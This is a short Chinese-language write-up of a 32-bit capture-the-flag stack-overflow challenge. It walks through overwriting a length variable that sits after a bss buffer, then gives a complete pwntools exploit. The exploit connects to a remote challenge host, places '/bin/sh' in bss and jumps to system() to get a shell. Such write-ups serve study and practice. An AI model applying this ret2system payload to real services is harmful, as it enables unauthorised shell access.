这道题是个32位栈溢出
fget()是一个安全的函数很难溢出
int message()
{
char s; // [esp+18h] [ebp-30h]
n = 10;
puts("you can leave some message here:");
fgets(A, 60, stdin);
puts("your name please:");
fgets(&s, n, stdin);
return puts("Thank you");
}
这就是漏洞函数我们需要覆盖n来操作下一步的栈溢出
首先我们先看到A在bss段
.bss:0804A064 ; __do_global_dtors_aux+14↑w
.bss:0804A065 align 20h
.bss:0804A080 public A
.bss:0804A080 ; char A[40]
.bss:0804A080 A db 28h dup(?) ; DATA XREF: message+2D↑o
.bss:0804A0A8 ; int n
.bss:0804A0A8 n dd ? ; DATA XREF: message+6↑w
.bss:0804A0A8 ; message+4B↑r
.bss:0804A0AC align 20h
.bss:0804A0C0 public choice
.bss:0804A0C0 ; char choice
.bss:0804A0C0 choice d
看到A是个字符串后它与a定义的bss地址相差40所以我们应该可以覆盖n来造成栈溢出
然后后门函数也给了只是少了/bin/sh我们就输入呗直接上exp:
from pwn import *
p=remote('182.254.217.142',10001)
#p=process('../cgpwna')
elf=ELF('../cgpwna')
bss_addr=0x0804A080
system_addr=0x080483F0
offset=0x30+0x4
payload='a'*40
payload+=p32(80)
payload+="/bin/sh"
p.recvuntil('your choice:')
p.sendline('1')
p.recvuntil('you can leave some message here:')
p.sendline(payload)
p.recvuntil('your name please:')
payload2='a'*offset+p32(system_addr)+"aaaa"+p32(bss_addr+44)
p.sendline(payload2)
p.interactive()
~~pwn好难